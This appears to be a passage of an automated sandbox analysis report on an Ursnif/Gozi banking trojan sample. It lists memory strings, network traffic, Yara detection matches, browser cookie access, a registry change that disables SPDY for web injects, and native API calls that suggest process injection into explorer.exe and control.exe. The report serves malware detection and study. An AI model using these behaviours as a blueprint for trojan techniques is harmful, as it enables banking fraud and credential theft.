Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001E.00000002.487850335.00000274579D0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.507964671.0000027467821000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000026.00000002.628178398.00000000053A0000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000026.00000000.472927251.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_00A55ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie 1_2_00A55ECA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 1_2_00A55ECA
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.362515361.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.475600162.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362460411.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.456841690.0000000000470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362409571.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.398940574.0000000004C6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362501622.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362480640.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362433705.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362526268.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.362379436.0000000004DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5292, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5720, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000027.00000003.464100297.000002179E910000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000003.473286008.0000000002AD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.629508039.000000000679E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001E.00000003.454805795.000002746FF10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.622819473.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000027.00000002.477760036.000000000089E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A66CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 1_2_00A66CBC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 1_2_00A6AC94
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 1_2_00A5ACD5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 1_2_00A5A027
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5E010 GetProcAddress,NtCreateSection,memset, 1_2_00A5E010
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A59DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00A59DAC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6CD7A NtQueryInformationProcess, 1_2_00A6CD7A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A67579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, 1_2_00A67579
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A67AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 1_2_00A67AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A57E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 1_2_00A57E14
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A747A1 NtMapViewOfSection, 1_2_00A747A1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A537E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00A537E7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A640A7 memset,NtQueryInformationProcess, 1_2_00A640A7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A64C67 NtGetContextThread,RtlNtStatusToDosError, 1_2_00A64C67
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A57878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 1_2_00A57878
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A7298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 1_2_00A7298D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A545FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 1_2_00A545FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A6956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 1_2_00A6956E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A61606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 1_2_00A61606
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00A5AA15 NtQuerySystemInformation,RtlNtStatusToDosError, 1_2_00A5AA15
Source: C:\Windows\explorer.exe Code function: 38_2_03B5B980 NtMapViewOfSection, 38_2_03B5B980
Source: C:\Windows\explorer.exe Code function: 38_2_03B7D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, 38_2_03B7D9EC
Source: C:\Windows\explorer.exe Code function: 38_2_03B569DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_03B569DC
Source: C:\Windows\explorer.exe Code function: 38_2_03B51148 NtCreateSection, 38_2_03B51148
Source: C:\Windows\explorer.exe Code function: 38_2_03B61084 NtQueryInformationProcess, 38_2_03B61084
Source: C:\Windows\explorer.exe Code function: 38_2_03B6F0D0 NtReadVirtualMemory, 38_2_03B6F0D0
Source: C:\Windows\explorer.exe Code function: 38_2_03B63EF4 NtQuerySystemInformation, 38_2_03B63EF4
Source: C:\Windows\explorer.exe Code function: 38_2_03B746EC NtAllocateVirtualMemory, 38_2_03B746EC
Source: C:\Windows\explorer.exe Code function: 38_2_03B57DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_03B57DA0
Source: C:\Windows\explorer.exe Code function: 38_2_03B71DF4 NtWriteVirtualMemory, 38_2_03B71DF4
Source: C:\Windows\explorer.exe Code function: 38_2_03B91004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_03B91004
Source: C:\Windows\System32\control.exe Code function: 39_2_00871084 NtQueryInformationProcess, 39_2_00871084
Source: C:\Windows\System32\control.exe Code function: 39_2_008840A4 NtQueryInformationProcess, 39_2_008840A4
Source: C:\Windows\System32\control.exe Code function: 39_2_0087F0D0 NtReadVirtualMemory, 39_2_0087F0D0
Source: C:\Windows\System32\control.exe Code function: 39_2_0086B980 NtMapViewOfSection, 39_2_0086B980
Source: C:\Windows\System32\control.exe Code function: 39_2_008669DC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 39_2_008669DC
Source: C:\Windows\System32\control.exe Code function: 39_2_0088D9EC NtQueryInformationToken,NtQueryInformationToken,NtClose, 39_2_0088D9EC
Source: C:\Windows\System32\control.exe Code function: 39_2_00861148 NtCreateSection, 39_2_00861148
Source: C:\Windows\System32\control.exe Code function: 39_2_00867DA0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 39_2_00867DA0
Source: C:\Windows\System32\control.exe Code function: 39_2_00881DF4 NtWriteVirtualMemory, 39_2_00881DF4
